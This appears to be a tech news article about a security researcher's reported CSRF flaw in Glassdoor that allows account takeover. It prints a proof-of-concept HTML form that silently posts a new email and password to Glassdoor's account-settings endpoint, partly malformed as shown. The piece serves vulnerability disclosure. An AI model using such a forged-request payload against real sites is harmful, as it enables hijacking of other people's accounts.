Glassdoor Account Take-Over CSRF Vulnerability
Mohamed M.Fouad, a independent security researcher from Egypt has discovered serious flaws in the Sausalito, California based anonymous companies reviewing site Glasdoor. Mohamed who has proven track record in field of security research and vulnerability pentesting has been acknowledged by top tech firms like Microsoft, Oracle, Yahoo, eBay, Sony, AT&T, Huawei, DropCam, Bitcasa, Get Pocket, Splitwise etc. Recently his article about CSRF vulnerabilities regarding Booking.com was published on Techworm, which was acknowledge by the company.
Mohamed while researching the Glassdoor website found that it is vulnerable to critical account hijacking via CSRF flaw. Mohamed says that a potential hacker can take over the website via account takeover and use it to deface the Glassdoor website as well as add new content which can lead them to a new page laden with malware. The hackers can also any details in user account settings and this is the most critical point in this article so you can change user password ,change user e-mail and this can be done via just one-click malicious URL.
Glassdoor is an American website where employees and former employees anonymously review companies and their management. Last year almost 500,000 companies were reviews by various anonymous reviewers on Glassdoor. Glassdoor was launched in 2008 and its ratings of CEOs and workplaces based on collating these reviews are widely reported and regarded as a benchmarking tool for job offers.
Proof of Concept (PoC)
Change Email Address and Password CSRF :
<formaction=”https://www.glassdoor.com/member/account/settings_execute.htm” method=”post” name=”csrf”>
<input type=”hidden” name=”selTabIndex=1″ value=”1″><br>
<inputtype=”hidden”name=”emailAddress” value=”[email protected]”><br>
<input type=”hidden” name=”birthYear” value=””><br>
<input type=”hidden” name=”race” value=””><br>
<input type=”hidden” name=”highestEducation” value=””><br>
<input type=”hidden” name=”newPassword” value=”[email protected]″><br>
<input type=”hidden” name=”confirmPassword” value=”[email protected]″><br>
Video of the PoC
Mohamed has also put up a video detail the vulnerabilities in Glassdoor, which you can see below
Mohamed specializes in jobs websites because they are the once which are visited by millions of job seekers across the world every day. Most the vulnerabilities found by Mohamed have been accepted by the companies and they have paid him bug bounty aware but unfortunately, Glassdoor has not acknowledged the above vulnerability as of yet.
Resource : Mohamed M. Fouad’s Blog